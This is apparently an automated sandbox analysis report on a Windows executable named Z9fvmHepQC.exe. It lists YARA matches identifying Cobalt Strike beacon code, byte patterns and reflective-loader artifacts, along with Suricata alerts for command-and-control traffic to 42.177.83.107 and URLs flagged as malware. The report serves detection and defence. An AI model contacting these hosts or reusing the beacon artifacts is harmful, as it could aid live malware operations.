00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x306e5:$a39: %s as %s\%s: %d 0x3f500:$a41: beacon.x64.dll 0x318ee:$a46: %s (admin) 0x30845:$a48: %s%s: %s 0x30711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3073d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x31937:$a51: Content-Length: %d
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3f69b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1a98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1bc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2014311961.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1b86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ac0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x316e5:$a39: %s as %s\%s: %d 0x40500:$a41: beacon.x64.dll 0x328ee:$a46: %s (admin) 0x31845:$a48: %s%s: %s 0x31711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3173d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x32937:$a51: Content-Length: %d
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1e0b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4069b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1b98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1cc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2013432042.00000215D7B93000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1c86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1bc0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2bd60:$a39: %s as %s\%s: %d 0x3b012:$a41: beacon.x64.dll 0x2cf70:$a46: %s (admin) 0x2bec0:$a48: %s%s: %s 0x2bd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2bdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cfb9:$a51: Content-Length: %d
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x185f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3b37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x15ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2034925752.00000215D7C30000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x16db3:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x16156:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x346e5:$a39: %s as %s\%s: %d 0x43500:$a41: beacon.x64.dll 0x358ee:$a46: %s (admin) 0x34845:$a48: %s%s: %s 0x34711:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x3473d:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x35937:$a51: Content-Length: %d
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x210b1:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4369b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1e98b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1fc3c:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.2009899163.00000215D7B90000.00000004.00000020.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x1f86c:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1ec0f:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
Process Memory Space: Z9fvmHepQC.exe PID: 1720	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: Z9fvmHepQC.exe PID: 1720	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: Z9fvmHepQC.exe PID: 1720	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0xc514:$a39: %s as %s\%s: %d 0x13129:$a39: %s as %s\%s: %d 0x190e9:$a39: %s as %s\%s: %d 0x170b37:$a39: %s as %s\%s: %d 0x17ed76:$a39: %s as %s\%s: %d 0x186154:$a39: %s as %s\%s: %d 0x192f54:$a39: %s as %s\%s: %d 0x19b3c3:$a39: %s as %s\%s: %d 0x29f224:$a39: %s as %s\%s: %d 0x2a5171:$a39: %s as %s\%s: %d 0x2ad98a:$a39: %s as %s\%s: %d 0x2b36cb:$a39: %s as %s\%s: %d 0x2c0c05:$a39: %s as %s\%s: %d 0x2c6ae2:$a39: %s as %s\%s: %d 0x2cd86c:$a39: %s as %s\%s: %d 0x2d3a1e:$a39: %s as %s\%s: %d 0x2dfabb:$a39: %s as %s\%s: %d 0x3936b5:$a39: %s as %s\%s: %d 0x39a6f5:$a39: %s as %s\%s: %d 0x3a0476:$a39: %s as %s\%s: %d 0x3a993c:$a39: %s as %s\%s: %d
Click to see the 248 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.Z9fvmHepQC.exe.215d76e0000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cd60:$a39: %s as %s\%s: %d 0x3c012:$a41: beacon.x64.dll 0x2df70:$a46: %s (admin) 0x2cec0:$a48: %s%s: %s 0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x2dfb9:$a51: Content-Length: %d
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.Z9fvmHepQC.exe.215d7691000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.Z9fvmHepQC.exe.21658210000.2.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x189f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3a97b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.215d76e0000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x162d2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17583:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.Z9fvmHepQC.exe.21658210000.2.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.21658210000.2.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.21658210000.2.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x189f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.21658210000.2.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3a97b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.21658210000.2.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x162d2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17583:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.Z9fvmHepQC.exe.215d7691000.0.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d7691000.0.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.Z9fvmHepQC.exe.215d7691000.0.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x189f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.Z9fvmHepQC.exe.215d7691000.0.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3a97b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.Z9fvmHepQC.exe.215d7691000.0.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x162d2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17583:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
Click to see the 31 entries

Suricata Signatures

ET MALWARE Cobalt Strike Malleable C2 (Amazon Profile)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T09:15:03.189163+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:08.957855+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:20.538352+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:26.104437+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:32.041417+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:37.604834+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:43.173422+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:48.765587+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:54.381770+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:59.987682+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:05.624457+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:11.223521+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:17.157487+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:22.809343+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:28.367420+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:33.941682+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:39.970265+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:45.552738+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:51.118357+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:57.150055+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:17:02.805519+0100	2055356	1	A Network Trojan was detected	192.168.2.5	49704	42.177.83.107	80	TCP

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T09:15:03.189163+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:08.957855+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:20.538352+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:26.104437+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:32.041417+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:37.604834+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:43.173422+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:48.765587+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:54.381770+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:15:59.987682+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:05.624457+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:11.223521+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:17.157487+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:22.809343+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:28.367420+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:33.941682+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:39.970265+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:45.552738+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:51.118357+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:16:57.150055+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP
2024-12-30T09:17:02.805519+0100	2032749	1	Malware Command and Control Activity Detected	192.168.2.5	49704	42.177.83.107	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookss	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books2	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books~	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksws	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=booksF	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=bookst	Avira URL Cloud: Label: malware
Source: http://p0.ssl.qhimg.com.cdn.dnsv1.com/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=17170	Avira URL Cloud: Label: malware
